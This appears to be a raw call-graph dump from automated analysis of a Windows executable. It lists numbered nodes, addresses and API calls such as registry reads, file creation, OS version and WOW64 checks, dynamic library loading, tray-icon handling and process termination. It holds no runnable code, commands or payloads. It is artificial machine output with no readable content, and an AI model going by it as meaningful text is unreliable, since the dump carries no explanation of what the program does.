b2fa07 116478->116479 116480 b2fa14 116478->116480 116479->116438 116481 b4042b 21 API calls 116480->116481 116482 b2fa1e 116481->116482 116483 b4045b 21 API calls 116482->116483 116483->116479 116484->116476 116486 b2f9ae 116485->116486 116488 b2f9b7 __fread_nolock 116485->116488 116487 b2faa1 21 API calls 116486->116487 116486->116488 116487->116488 116488->116470 118530 b40a12 118531 b40a1e ___scrt_is_nonwritable_in_current_image 118530->118531 118560 b404e7 118531->118560 118533 b40a25 118534 b40b6d 118533->118534 118537 b40a4f 118533->118537 118598 b40e4d 4 API calls 2 library calls 118534->118598 118536 b40b74 118599 b44d5e 27 API calls _abort 118536->118599 118547 b40a8e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 118537->118547 118571 b522a1 118537->118571 118539 b40b7a 118600 b44d10 27 API calls _abort 118539->118600 118543 b40b82 118545 b40a6e ___scrt_is_nonwritable_in_current_image 118546 b40aee 118579 b40f69 118546->118579 118547->118546 118594 b44d26 37 API calls 2 library calls 118547->118594 118549 b40af4 118583 b3fc28 118549->118583 118554 b40b10 118554->118536 118555 b40b14 118554->118555 118556 b40b1d 118555->118556 118596 b44d01 27 API calls _abort 118555->118596 118597 b40671 13 API calls 2 library calls 118556->118597 118559 b40b25 118559->118545 118561 b404f0 118560->118561 118601 b40ca4 IsProcessorFeaturePresent 118561->118601 118563 b404fc 118602 b43ed4 10 API calls 3 library calls 118563->118602 118565 b40501 118566 b40505 118565->118566 118603 b5213b IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 118565->118603 118566->118533 118568 b4050e 118569 b4051c 118568->118569 118604 b43efd 8 API calls 3 library calls 118568->118604 118569->118533 118574 b522b8 118571->118574 118573 b40a68 118573->118545 118575 b52245 118573->118575 118605 b411dd 118574->118605 118576 b52274 118575->118576 118577 b411dd _ValidateLocalCookies 5 API calls 118576->118577 118578 b5229d 118577->118578 118578->118547 118613 b43580 118579->118613 118581 b40f7c GetStartupInfoW 118582 b40f8f 118581->118582 118582->118549 118584 b3fc8f 118583->118584 118585 b3fc34 IsThemeActive 118583->118585 118595 b44c35 GetModuleHandleW 118584->118595 118615 b44e6e 118585->118615 118587 b3fc5f 118621 b44ed4 118587->118621 118589 b3fc66 118628 b3fc98 SystemParametersInfoW SystemParametersInfoW 118589->118628 118591 b3fc6d 118629 b32d33 118591->118629 118594->118546 118595->118554 118596->118556 118597->118559 118598->118536 118599->118539 118600->118543 118601->118563 118602->118565 118603->118568 118604->118566 118606 b411e6 118605->118606 118607 b411e8 IsProcessorFeaturePresent 118605->118607 118606->118573 118609 b4122a 118607->118609 118612 b411ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 118609->118612 118611 b4130d 118611->118573 118612->118611 118614 b43597 118613->118614 118614->118581 118614->118614 118616 b44e7a ___scrt_is_nonwritable_in_current_image 118615->118616 118678 b52e35 EnterCriticalSection 118616->118678 118618 b44e85 pre_c_initialization 118679 b44ec5 118618->118679 118620 b44eba ___scrt_is_nonwritable_in_current_image 118620->118587 118622 b44ee0 118621->118622 118623 b44efa 118621->118623 118622->118623 118683 b526cc 19 API calls __dosmaperr 118622->118683 118623->118589 118625 b44eea 118684 b52610 25 API calls pre_c_initialization 118625->118684 118627 b44ef5 118627->118589 118628->118591 118630 b32d43 __wsopen_s 118629->118630 118631 b2f38f 21 API calls 118630->118631 118632 b32d4f GetCurrentDirectoryW 118631->118632 118685 b32a5e 118632->118685 118678->118618 118682 b52e7d LeaveCriticalSection 118679->118682 118681 b44ecc 118681->118620 118682->118681 118683->118625 118684->118627 118686 b2f38f 21 API calls 118685->118686 118687 b32a74 118686->118687 118800 b32f4b 118687->118800 118689 b32a92 118690 b2f9fa 21 API calls 118689->118690 118691 b32aa6 118690->118691 118692 b2fbc8 21 API calls 118691->118692 118693 b32ab1 118692->118693 118801 b32f58 __wsopen_s 118800->118801 118802 b2f82c 21 API calls 118801->118802 118803 b32f8a 118801->118803 118802->118803 118804 b2f6ad 21 API calls 118803->118804 118813 b32fc0 118803->118813 118804->118803 118805 b2fa3b 21 API calls 118806 b330b7 118805->118806 118808 b32608 21 API calls 118806->118808 118807 b2fa3b 21 API calls 118807->118813 118810 b330c3 118808->118810 118809 b2f6ad 21 API calls 118809->118813 118810->118689 118812 b3308e 118812->118805 118812->118810 118813->118807 118813->118809 118813->118812 118844 b32608 118813->118844 118845 b32617 118844->118845 118849 b32638 __fread_nolock 118844->118849 118848 b4045b 21 API calls 118845->118848 118846 b4042b 21 API calls 118847 b3264b 118846->118847 118847->118813 118848->118849 118849->118846 116489 b58232 116494 b57fee 116489->116494 116492 b5825a 116499 b5801f try_get_first_available_module 116494->116499 116496 b5821e 116513 b52610 25 API calls pre_c_initialization 116496->116513 116498 b58173 116498->116492 116506 b608ae 116498->116506 116505 b58168 116499->116505 116509 b48d2b 39 API calls 2 library calls 116499->116509 116501 b581bc 116501->116505 116510 b48d2b 39 API calls 2 library calls 116501->116510 116503 b581db 116503->116505 116511 b48d2b 39 API calls 2 library calls 116503->116511 116505->116498 116512 b526cc 19 API calls __dosmaperr 116505->116512 116514 b5ffab 116506->116514 116508 b608c9 116508->116492 116509->116501 116510->116503 116511->116505 116512->116496 116513->116498 116516 b5ffb7 ___scrt_is_nonwritable_in_current_image 116514->116516 116515 b5ffc5 116571 b526cc 19 API calls __dosmaperr 116515->116571 116516->116515 116519 b5fffe 116516->116519 116518 b5ffca 116572 b52610 25 API calls pre_c_initialization 116518->116572 116525 b60585 116519->116525 116524 b5ffd4 ___scrt_is_nonwritable_in_current_image 116524->116508 116526 b605a2 116525->116526 116527 b605b7 116526->116527 116528 b605d0 116526->116528 116588 b526b9 19 API calls __dosmaperr 116527->116588 116574 b5504f 116528->116574 116531 b605d5 116533 b605f5 116531->116533 116534 b605de 116531->116534 116532 b605bc 116589 b526cc 19 API calls __dosmaperr 116532->116589 116587 b602c4 CreateFileW 116533->116587 116590 b526b9 19 API calls __dosmaperr 116534->116590 116538 b605e3 116591 b526cc 19 API calls __dosmaperr 116538->116591 116540 b606ab GetFileType 116541 b606b6 GetLastError 116540->116541 116542 b606fd 116540->116542 116594 b52696 19 API calls 2 library calls 116541->116594 116596 b54f98 20 API calls 3 library calls 116542->116596 116543 b60680 GetLastError 116593 b52696 19 API calls 2 library calls 116543->116593 116546 b6062e 116546->116540 116546->116543 116592 b602c4 CreateFileW 116546->116592 116547 b606c4 CloseHandle 116547->116532 116549 b606ed 116547->116549 116595 b526cc 19 API calls __dosmaperr 116549->116595 116551 b60673 116551->116540 116551->116543 116553 b6071e 116554 b6076a 116553->116554 116597 b604d5 71 API calls 4 library calls 116553->116597 116559 b60797 116554->116559 116598 b60077 71 API calls 4 library calls 116554->116598 116555 b606f2 116555->116532 116558 b60790 116558->116559 116560 b607a8 116558->116560 116599 b584de 116559->116599 116562 b60022 116560->116562 116563 b60826 CloseHandle 116560->116563 116573 b6004b LeaveCriticalSection __wsopen_s 116562->116573 116614 b602c4 CreateFileW 116563->116614 116565 b60851 116566 b60887 116565->116566 116567 b6085b GetLastError 116565->116567 116566->116562 116615 b52696 19 API calls 2 library calls 116567->116615 116569 b60867 116616 b55161 20 API calls 3 library calls 116569->116616 116571->116518 116572->116524 116573->116524 116575 b5505b ___scrt_is_nonwritable_in_current_image 116574->116575 116617 b52e35 EnterCriticalSection 116575->116617 116577 b550a9 116618 b55158 116577->116618 116579 b55087 116621 b54e2c 20 API calls 3 library calls 116579->116621 116580 b550d2 ___scrt_is_nonwritable_in_current_image 116580->116531 116582 b55062 116582->116577 116582->116579 116584 b550f5 EnterCriticalSection 116582->116584 116583 b5508c 116583->116577 116622 b54f73 EnterCriticalSection 116583->116622 116584->116577 116586 b55102 LeaveCriticalSection 116584->116586 116586->116582 116587->116546 116588->116532 116589->116562 116590->116538 116591->116532 116592->116551 116593->116532 116594->116547 116595->116555 116596->116553 116597->116554 116598->116558 116624 b551f2 116599->116624 116601 b584f4 116637 b55161 20 API calls 3 library calls 116601->116637 116603 b584ee 116603->116601 116604 b58526 116603->116604 116607 b551f2 __wsopen_s 25 API calls 116603->116607 116604->116601 116605 b551f2 __wsopen_s 25 API calls 116604->116605 116608 b58532 CloseHandle 116605->116608 116606 b5854c 116609 b5856e 116606->116609 116638 b52696 19 API calls 2 library calls 116606->116638 116610 b5851d 116607->116610 116608->116601 116611 b5853e GetLastError 116608->116611 116609->116562 116613 b551f2 __wsopen_s 25 API calls 116610->116613 116611->116601 116613->116604 116614->116565 116615->116569 116616->116566 116617->116582 116623 b52e7d LeaveCriticalSection 116618->116623 116620 b5515f 116620->116580 116621->116583 116622->116577 116623->116620 116625 b55214 116624->116625 116626 b551ff 116624->116626 116632 b55239 116625->116632 116641 b526b9 19 API calls __dosmaperr 116625->116641 116639 b526b9 19 API calls __dosmaperr 116626->116639 116628 b55204 116640 b526cc 19 API calls __dosmaperr 116628->116640 116630 b55244 116642 b526cc 19 API calls __dosmaperr 116630->116642 116632->116603 116634 b5520c 116634->116603 116635 b5524c 116643 b52610 25 API calls pre_c_initialization 116635->116643 116637->116606 116638->116609 116639->116628 116640->116634 116641->116630 116642->116635 116643->116634 119415 1403ea7 LdrInitializeThunk 119416 b2105b 119421 b30e5b 119416->119421 119418 b2106a 119452 b406d4 28 API calls __onexit 119418->119452 119420 b21074 119422 b30e6b __wsopen_s 119421->119422 119423 b2f38f 21 API calls 119422->119423 119424 b30f21 119423->119424 119425 b21155 23 API calls 119424->119425 119426 b30f2a 119425->119426 119453 b3fd48 119426->119453 119429 b2f91b 21 API calls 119430 b30f43 119429->119430 119431 b32608 21 API calls 119430->119431 119432 b30f52 119431->119432 119433 b2f38f 21 API calls 119432->119433 119434 b30f5b 119433->119434 119435 b2f9fa 21 API calls 119434->119435 119436 b30f64 RegOpenKeyExW 119435->119436 119437 b76fd8 RegQueryValueExW 119436->119437 119442 b30f86 119436->119442 119438 b76ff5 119437->119438 119439 b7706e RegCloseKey 119437->119439 119440 b4045b 21 API calls 119438->119440 119439->119442 119451 b77080 _wcslen 119439->119451 119441 b7700e 119440->119441 119444 b32572 21 API calls 119441->119444 119442->119418 119443 b2f6ad 21 API calls 119443->119451 119445 b77019 RegQueryValueExW 119444->119445 119446 b77036 119445->119446 119448 b77050 messages 119445->119448 119447 b2f82c 21 API calls 119446->119447 119447->119448 119448->119439 119449 b2fa3b 21 API calls 119449->119451 119450 b32608 21 API calls 119450->119451 119451->119442 119451->119443 119451->119449 119451->119450 119452->119420 119454 b61e50 __wsopen_s 119453->119454 119455 b3fd55 GetFullPathNameW 119454->119455 119456 b3fd77 119455->119456 119457 b2f82c 21 API calls 119456->119457 119458 b30f35 119457->119458 119458->119429 119459 b21098 119464 b3310d 119459->119464 119463 b210a7 119465 b2f38f 21 API calls 119464->119465 119466 b33124 GetVersionExW 119465->119466 119467 b2f82c 21 API calls 119466->119467 119468 b33171 119467->119468 119469 b2f9a0 21 API calls 119468->119469 119473 b331a7 119468->119473 119470 b3319b 119469->119470 119472 b2f433 21 API calls 119470->119472 119471 b3324c GetCurrentProcess IsWow64Process 119474 b33268 119471->119474 119472->119473 119473->119471 119475 b77c2f 119473->119475 119476 b77c74 GetSystemInfo 119474->119476 119477 b33280 LoadLibraryA 119474->119477 119478 b33291 GetProcAddress 119477->119478 119479 b332cf GetSystemInfo 119477->119479 119478->119479 119481 b332a1 GetNativeSystemInfo 119478->119481 119480 b332a7 119479->119480 119482 b2109d 119480->119482 119483 b332ab FreeLibrary 119480->119483 119481->119480 119484 b406d4 28 API calls __onexit 119482->119484 119483->119482 119484->119463 119485 b33ad9 119486 b34164 119485->119486 119487 b34e5a GetWindowLongW 119486->119487 119488 b34178 119487->119488 119489 b3419b 119488->119489 119490 b3426f DefDlgProcW 119488->119490 119505 b78447 119488->119505 119491 b341a7 119489->119491 119492 b341f6 119489->119492 119568 b341f1 119490->119568 119496 b341b6 119491->119496 119497 b342e8 119491->119497 119577 b3432d 119491->119577 119494 b34228 119492->119494 119495 b341ff 119492->119495 119498 b785a3 119494->119498 119499 b34236 119494->119499 119500 b34205 119495->119500 119501 b785c0 119495->119501 119502 b784e8 119496->119502 119503 b341bc 119496->119503 119506 b78577 119497->119506 119507 b342f3 119497->119507 119601 bb9495 28 API calls 119498->119601 119499->119501 119504 b3423f 119499->119504 119509 b3428a 119500->119509 119510 b3420e 119500->119510 119598 bb94ed 110 API calls 119501->119598 119589 bb9ad7 84 API calls 119502->119589 119512 b341c5 119503->119512 119513 b34349 119503->119513 119521 b785f0 119504->119521 119546 b78623 119504->119546 119547 b3425a 119504->119547 119544 b7849d 119505->119544 119586 b9c4ff 53 API calls _strftime 119505->119586 119596 bb9fb4 98 API calls 119506->119596 119515 b78565 119507->119515 119516 b342fc 119507->119516 119511 b342ad 119509->119511 119518 b78584 119509->119518 119537 b342a3 119509->119537 119510->119518 119519 b3421c 119510->119519 119525 b34e5a GetWindowLongW 119511->119525 119526 b34280 119512->119526 119527 b341ce 119512->119527 119535 b3434b 119513->119535 119536 b3436d 119513->119536 119595 bb9e05 CreateProcessW CloseHandle DefDlgProcW 119515->119595 119530 b34305 119516->119530 119531 b7854f 119516->119531 119533 b7859a 119518->119533 119534 b785a9 119518->119534 119580 b33f61 38 API calls 119519->119580 119524 b7860b DefDlgProcW 119521->119524 119524->119568 119540 b342b8 GetSysColor 119525->119540 119581 b33fe0 59 API calls 119526->119581 119538 b34361 119527->119538 119539 b341d7 119527->119539 119528 b7847f 119528->119544 119555 b34e5a GetWindowLongW 119528->119555 119542 b3430e 119530->119542 119543 b78539 119530->119543 119594 bb99f9 6 API calls 119531->119594 119533->119490 119533->119498 119597 bb9e3a ClientToScreen ImageList_DragMove DefDlgProcW 119534->119597 119583 b3410d DefDlgProcW GetWindowLongW 119535->119583 119536->119544 119563 b34381 119536->119563 119536->119568 119537->119490 119537->119511 119584 b33f00 DefDlgProcW PostMessageW PostMessageW GetWindowLongW 119538->119584 119539->119490 119553 b341e0 119539->119553 119550 b342d3 119540->119550 119551 b342d6 SetBkColor 119540->119551 119556 b78523 119542->119556 119557 b3431a 119542->119557 119593 bb9f78 GetWindowLongW DefDlgProcW 119543->119593 119558 b784db 119544->119558 119559 b784ba 119544->119559 119544->119568 119600 bb9dba 22 API calls 119546->119600 119560 b78617 119547->119560 119561 b34263 119547->119561 119550->119551 119582 b34b00 22 API calls 119551->119582 119579 b33ae2 7 API calls 119553->119579 119555->119544 119592 bb9709 52 API calls ___scrt_get_show_window_mode 119556->119592 119569 b34323 119557->119569 119570 b7850c 119557->119570 119588 bb9e94 GetWindowLongW GetWindowRect GetWindowRect MoveWindow 119558->119588 119559->119490 119571 b784c4 119559->119571 119599 bb9b58 54 API calls 119560->119599 119561->119490 119573 b785dc IsThemeActive 119561->119573 119585 b33f38 18 API calls 119563->119585 119569->119490 119569->119577 119591 bbaca8 27 API calls 119570->119591 119587 bba94e 9 API calls 119571->119587 119573->119524 119576 b784d6 119576->119568 119590 bba8ca 41 API calls 119577->119590 119579->119568 119580->119568 119581->119568 119582->119568 119583->119568 119584->119568 119585->119568 119586->119528 119587->119576 119588->119568 119589->119576 119590->119568 119591->119568 119592->119576 119593->119568 119594->119568 119595->119568 119596->119576 119597->119568 119598->119576 119599->119576 119600->119568 119601->119568 119602 b4eb9e 119603 b4ebaa ___scrt_is_nonwritable_in_current_image 119602->119603 119604 b4ebb6 119603->119604 119605 b4ebcb 119603->119605 119621 b526cc 19 API calls __dosmaperr 119604->119621 119615 b490a1 EnterCriticalSection 119605->119615 119608 b4ebd7 119616 b4ec0b 119608->119616 119609 b4ebbb 119622 b52610 25 API calls pre_c_initialization 119609->119622 119614 b4ebc6 ___scrt_is_nonwritable_in_current_image 119615->119608 119624 b4ec36 119616->119624 119618 b4ec18 119619 b4ebe4 119618->119619 119644 b526cc 19 API calls __dosmaperr 119618->119644 119623 b4ec01 LeaveCriticalSection __fread_nolock 119619->119623 119621->119609 119622->119614 119623->119614 119625 b4ec44 119624->119625 119626 b4ec5e 119624->119626 119648 b526cc 19 API calls __dosmaperr 119625->119648 119628 b4d7f5 __fread_nolock 25 API calls 119626->119628 119630 b4ec67 119628->119630 119629 b4ec49 119649 b52610 25 API calls pre_c_initialization 119629->119649 119645 b59239 119630->119645 119634 b4ecef 119638 b4ed0c 119634->119638 119640 b4ed1e 119634->119640 119635 b4ed6b 119636 b4ed78 119635->119636 119635->119640 119651 b526cc 19 API calls __dosmaperr 119636->119651 119650 b4ef4f 30 API calls 4 library calls 119638->119650 119641 b4ec54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 119640->119641 119652 b4edcb 29 API calls 2 library calls 119640->119652 119641->119618 119642 b4ed16 119642->119641 119644->119619 119653 b590b6 119645->119653 119647 b4ec83 119647->119634 119647->119635 119647->119641 119648->119629 119649->119641 119650->119642 119651->119641 119652->119641 119654 b590c2 ___scrt_is_nonwritable_in_current_image 119653->119654 119655 b590e2 119654->119655 119656 b590ca 119654->119656 119658 b59196 119655->119658 119662 b5911a 119655->119662 119679 b526b9 19 API calls __dosmaperr 119656->119679 119684 b526b9 19 API calls __dosmaperr 119658->119684 119660 b590cf 119680 b526cc 19 API calls __dosmaperr 119660->119680 119661 b5919b 119685 b526cc 19 API calls __dosmaperr 119661->119685 119678 b54f73 EnterCriticalSection 119662->119678 119666 b590d7 ___scrt_is_nonwritable_in_current_image 119666->119647 119667 b591a3 119686 b52610 25 API calls pre_c_initialization 119667->119686 119668 b59120 119670 b59144 119668->119670 119671 b59159 119668->119671 119681 b526cc 19 API calls __dosmaperr 119670->119681 119673 b591bb __wsopen_s 27 API calls 119671->119673 119675 b59154 119673->119675 119674 b59149 119682 b526b9 19 API calls __dosmaperr 119674->119682 119683 b5918e LeaveCriticalSection __wsopen_s 119675->119683 119678->119668 119679->119660 119680->119666 119681->119674 119682->119675 119683->119666 119684->119661 119685->119667 119686->119666 116644 13ebcb3 116645 13ec0d7 116644->116645 116647 13ed75a 116645->116647 116650 1415751 116647->116650 116658 1415967 116650->116658 116652 13ed766 116653 1415760 116653->116652 116661 140adc1 116653->116661 116741 140ac41 116653->116741 116821 13f13d9 116653->116821 116825 140a805 GetCurrentProcess TerminateProcess 116653->116825 116826 1415afe GetPEB 116658->116826 116660 1415973 116660->116653 116662 140adc9 116661->116662 116662->116662 116828 13f3759 GetModuleHandleA 116662->116828 116742 140ad0c 116741->116742 116743 13f3759 43 API calls 116742->116743 116744 140adda 116743->116744 116745 1407405 14 API calls 116744->116745 116746 140aded 116745->116746 116747 13f16c9 11 API calls 116746->116747 116748 140adfc 116747->116748 116749 13f048d 22 API calls 116748->116749 116750 140ae0b 116749->116750 116751 140ae14 MessageBoxA 116750->116751 116752 140ae2c 116750->116752 116753 140aff2 116751->116753 116754 14078ad 15 API calls 116752->116754 116756 13f1699 11 API calls 116753->116756 116755 140ae39 116754->116755 116757 13f16c9 11 API calls 116755->116757 116758 140b00c 116756->116758 116760 140ae46 116757->116760 117469 13f289d 11 API calls 116758->117469 116762 140ae83 116760->116762 117464 13f5309 11 API calls 116760->117464 116761 140b01a 116763 13f1675 11 API calls 116761->116763 116765 140aea4 116762->116765 116766 140ae8c MessageBoxA 116762->116766 116767 140b022 116763->116767 116769 1407705 11 API calls 116765->116769 116766->116753 117470 13f289d 11 API calls 116767->117470 116768 140ae5c 116771 13f16c9 11 API calls 116768->116771 116772 140aeb9 116769->116772 116775 140ae69 116771->116775 116773 13f16c9 11 API calls 116772->116773 116776 140aec9 116773->116776 116774 140b030 116777 13f1699 11 API calls 116774->116777 116778 14078ad 15 API calls 116775->116778 116779 1407915 11 API calls 116776->116779 116780 140b03d 116777->116780 116781 140ae76 116778->116781 116782 140aede 116779->116782 116780->116652 116783 13f16c9 11 API calls 116781->116783 116784 13f16c9 11 API calls 116782->116784 116783->116762 116785 140aeeb 116784->116785 116786 1407705 11 API calls 116785->116786 116787 140af00 116786->116787 116788 13f16c9 11 API calls 116787->116788 116789 140af10 116788->116789 116790 1407915 11 API calls 116789->116790 116791 140af25 116790->116791 116792 13f16c9 11 API calls 116791->116792 116793 140af32 GetTickCount 116792->116793 116794 140af43 116793->116794 116795 140aa4d 52 API calls 116794->116795 116796 140af69 116795->116796 116797 1409905 76 API calls 116796->116797 116798 140af75 116797->116798 116799 1408ff1 86 API calls 116798->116799 116800 140af7f 116799->116800 116801 1401c89 11 API calls 116800->116801 116802 140af93 116801->116802 116803 140758d 11 API calls 116802->116803 116804 140af9b 116803->116804 116805 140afab 116804->116805 116806 140af9f 116804->116806 116822 13f140c 116821->116822 117471 13f1369 116822->117471 116825->116652 116827 1415b11 116826->116827 116827->116660 116829 13f378c 116828->116829 116830 13f13d9 42 API calls 116829->116830 116831 13f3798 116830->116831 116832 1407405 116831->116832 117106 1407369 116832->117106 116834 140742a 117115 140726d 116834->117115 116838 140743f 117132 1404f69 116838->117132 117158 14071cd 117106->117158 117108 1407381 117109 1407391 117108->117109 117110 1407386 117108->117110 117112 13f16c9 11 API calls 117109->117112 117166 14072d5 11 API calls 117110->117166 117114 140739d 117112->117114 117113 140738f 117113->116834 117114->116834 117116 14071cd 14 API calls 117115->117116 117117 1407285 117116->117117 117118 13f1919 117117->117118 117119 13f191d 117118->117119 117120 13f195c 117118->117120 117121 13f16c9 117119->117121 117122 13f1927 117119->117122 117120->116838 117129 13f16dd 117121->117129 117167 13f1739 117121->117167 117123 13f193a 117122->117123 117124 13f1951 117122->117124 117176 13f1c41 11 API calls 117123->117176 117177 13f1c41 11 API calls 117124->117177 117126 13f170b 117126->116838 117129->117126 117172 13f0125 117129->117172 117131 13f193f 117131->116838 117133 1404f7d 117132->117133 117184 1404ded 117133->117184 117136 1405b8d 117137 1405bae 117136->117137 117201 1405b19 117137->117201 117159 13f1675 11 API calls 117158->117159 117160 14071ea 117159->117160 117161 1407211 RegOpenKeyExA 117160->117161 117162 140725b RegCloseKey 117161->117162 117163 140721c 117161->117163 117162->117108 117164 1407235 RegQueryValueExA 117163->117164 117164->117162 117165 1407243 117164->117165 117165->117162 117166->117113 117168 13f173d 117167->117168 117169 13f1761 117167->117169 117178 13f00f5 117168->117178 117169->117129 117173 13f013d 117172->117173 117174 13f012a 117172->117174 117173->117126 117174->117173 117183 13f01fd 11 API calls 117174->117183 117176->117131 117177->117131 117179 13f00fd 117178->117179 117181 13f0115 117178->117181 117179->117181 117182 13f01fd 11 API calls 117179->117182 117181->117129 117182->117181 117183->117173 117185 1404e15 117184->117185 117186 13f1675 11 API calls 117185->117186 117188 1404f1f 117186->117188 117189 13f1919 11 API calls 117188->117189 117190 1404f43 117188->117190 117193 13f185d 117188->117193 117189->117188 117191 13f1675 11 API calls 117190->117191 117192 1404f58 117191->117192 117192->117136 117196 13f1765 117193->117196 117197 13f1739 11 API calls 117196->117197 117198 13f1775 117197->117198 117199 13f1675 11 API calls 117198->117199 117200 13f178d 117199->117200 117200->117188 117202 1405b2d 117201->117202 117218 140599d 117202->117218 117205 13f170d 117219 14059c5 117218->117219 117220 13f1675 11 API calls 117219->117220 117222 1405acf 117220->117222 117221 13f185d 11 API calls 117221->117222 117222->117221 117223 13f1919 11 API calls 117222->117223 117224 1405af3 117222->117224 117223->117222 117225 13f1675 11 API calls 117224->117225 117226 1405b08 117225->117226 117226->117205 117464->116768 117469->116761 117470->116774 117472 13f137e 117471->117472 117473 13f13b4 117471->117473 117472->117473 117476 13f3489 117472->117476 117482 13f2929 117472->117482 117473->116652 117477 13f349a 117476->117477 117478 13f34cb 117476->117478 117477->117478 117486 13f2971 117477->117486 117478->117472 117481 13f1765 11 API calls 117481->117478 117483 13f2939 GetModuleFileNameA 117482->117483 117484 13f2955 117482->117484 117490 13f2bbd GetModuleFileNameA RegOpenKeyExA 117483->117490 117484->117472 117487 13f2985 117486->117487 117488 13f29a1 LoadStringA 117486->117488 117487->117488 117489 13f2929 30 API calls 117487->117489 117488->117481 117489->117488 117491 13f2c3f 117490->117491 117492 13f2bff RegOpenKeyExA 117490->117492 117508 13f29e5 12 API calls 117491->117508 117492->117491 117493 13f2c1d RegOpenKeyExA 117492->117493 117493->117491 117495 13f2cc8 lstrcpyn GetThreadLocale GetLocaleInfoA 117493->117495 117499 13f2cff 117495->117499 117500 13f2df8 117495->117500 117496 13f2c64 RegQueryValueExA 117497 13f2ca6 RegCloseKey 117496->117497 117498 13f2c84 RegQueryValueExA 117496->117498 117497->117484 117498->117497 117501 13f2ca2 117498->117501 117499->117500 117502 13f2d0f lstrlen 117499->117502 117500->117484 117501->117497 117503 13f2d28 117502->117503 117503->117500 117504 13f2d56 lstrcpyn LoadLibraryExA 117503->117504 117505 13f2d82 117503->117505 117504->117505 117505->117500 117506 13f2d8c lstrcpyn LoadLibraryExA 117505->117506 117506->117500 117507 13f2dc2 lstrcpyn LoadLibraryExA 117506->117507 117507->117500 117508->117496 117509 b3397e 117512 b33998 117509->117512 117513 b339af 117512->117513 117514 b33a13 117513->117514 117515 b339b4 117513->117515 117556 b33a11 117513->117556 117517 b780b1 117514->117517 117518 b33a19 117514->117518 117519 b339c1 117515->117519 117520 b33a8d PostQuitMessage 117515->117520 117516 b339f8 DefWindowProcW 117524 b33992 117516->117524 117568 b2ad2c 10 API calls 117517->117568 117525 b33a20 117518->117525 117526 b33a45 SetTimer RegisterWindowMessageW 117518->117526 117521 b7811e 117519->117521 117522 b339cc 117519->117522 117520->117524 117573 b8cde4 65 API calls ___scrt_get_show_window_mode 117521->117573 117527 b33a97 117522->117527 117528 b339d6 117522->117528 117532 b78052 117525->117532 117533 b33a29 KillTimer 117525->117533 117526->117524 117529 b33a6e CreatePopupMenu 117526->117529 117557 b33619 117527->117557 117534 b339e1 117528->117534 117535 b78103 117528->117535 117529->117524 117531 b780d2 117569 b2ad46 40 API calls 117531->117569 117539 b78057 117532->117539 117540 b7808d MoveWindow 117532->117540 117564 b335b3 Shell_NotifyIconW ___scrt_get_show_window_mode 117533->117564 117542 b33a7b 117534->117542 117543 b339ec 117534->117543 117535->117516 117572 b81bdd 21 API calls 117535->117572 117536 b78130 117536->117516 117536->117524 117544 b7805d 117539->117544 117545 b7807c SetFocus 117539->117545 117540->117524 117566 b336c0 75 API calls ___scrt_get_show_window_mode 117542->117566 117543->117516 117570 b335b3 Shell_NotifyIconW ___scrt_get_show_window_mode 117543->117570 117544->117543 117548 b78066 117544->117548 117545->117524 117546 b33a3c 117565 b3514d DeleteObject DestroyWindow 117546->117565 117567 b2ad2c 10 API calls 117548->117567 117551 b33a8b 117551->117524 117554 b780f7 117571 b334c7 60 API calls ___scrt_get_show_window_mode 117554->117571 117556->117516 117558 b33631 ___scrt_get_show_window_mode 117557->117558 117559 b336b7 117557->117559 117574 b337b5 117558->117574 117559->117524 117561 b336a0 KillTimer SetTimer 117561->117559 117562 b33658 117562->117561 117563 b77d46 Shell_NotifyIconW 117562->117563 117563->117561 117564->117546 117565->117524 117566->117551 117567->117524 117568->117531 117569->117543 117570->117554 117571->117556 117572->117556 117573->117536 117575 b337d2 117574->117575 117594 b338b7 117574->117594 117576 b2f6d1 21 API calls 117575->117576 117577 b337e0 117576->117577 117578 b77f87 LoadStringW 117577->117578 117579 b337ed 117577->117579 117582 b77fa1 117578->117582 117580 b2f82c 21 API calls 117579->117580 117581 b33802 117580->117581 117583 b3380f 117581->117583 117590 b77fbd 117581->117590 117585 b2fbc8 21 API calls 117582->117585 117588 b33835 ___scrt_get_show_window_mode 117582->117588 117583->117582 117584 b33819 117583->117584 117604 b2f91b 117584->117604 117585->117588 117592 b3389d Shell_NotifyIconW 117588->117592 117590->117588 117591 b78000 117590->117591 117593 b2f38f 21 API calls 117590->117593 117623 b4016e 50 API calls 117591->117623 117592->117594 117595 b77fe7 117593->117595 117594->117562 117622 b8a7a8 22 API calls 117595->117622 117598 b7801f 117600 b2f91b 21 API calls 117598->117600 117599 b77ff2 117601 b2f78e 21 API calls 117599->117601 117602 b78030 117600->117602 117601->117591 117603 b2f91b 21 API calls 117602->117603 117603->117588 117605 b2f932 117604->117605 117606 b762c2 117604->117606 117624 b2f8bc 117605->117624 117608 b4042b 21 API calls 117606->117608 117609 b762cc _wcslen 117608->117609 117611 b4045b 21 API calls 117609->117611 117610 b2f93d 117613 b2f78e 117610->117613 117612 b76308 __fread_nolock 117611->117612 117614 b2f7a0 117613->117614 117615 b761ef 117613->117615 117639 b2f716 117614->117639 117649 b81b82 21 API calls __fread_nolock 117615->117649 117618 b761f9 117620 b76205 117618->117620 117621 b2fbc8 21 API calls 117618->117621 117619 b2f7ac 117619->117588 117621->117620 117622->117599 117623->117598 117625 b2f8cc _wcslen 117624->117625 117626 b76266 117625->117626 117627 b2f8df 117625->117627 117629 b4042b 21 API calls 117626->117629 117634 b2f7b3 117627->117634 117631 b76270 117629->117631 117630 b2f8ec __fread_nolock 117630->117610 117632 b4045b 21 API calls 117631->117632 117633 b762a3 __fread_nolock 117632->117633 117635 b2f7cb 117634->117635 117638 b2f7c4 __fread_nolock 117634->117638 117636 b4045b 21 API calls 117635->117636 117637 b76214 117635->117637 117636->117638 117638->117630 117640 b2f725 117639->117640 117645 b2f759 __fread_nolock 117639->117645 117641 b76186 117640->117641 117642 b2f74c 117640->117642 117640->117645 117644 b4042b 21 API calls 117641->117644 117643 b2f7b3 21 API calls 117642->117643 117643->117645 117646 b76195 117644->117646 117645->117619 117647 b4045b 21 API calls 117646->117647 117648 b761cc __fread_nolock 117647->117648 117649->117618 117650 b27dfc 117653 b26980 117650->117653 117654 b2699b 117653->117654 117655 b66657 117654->117655 117656 b666a5 117654->117656 117676 b269c0 117654->117676 117659 b66661 117655->117659 117662 b6666e 117655->117662 117655->117676 117693 ba6460 92 API calls 2 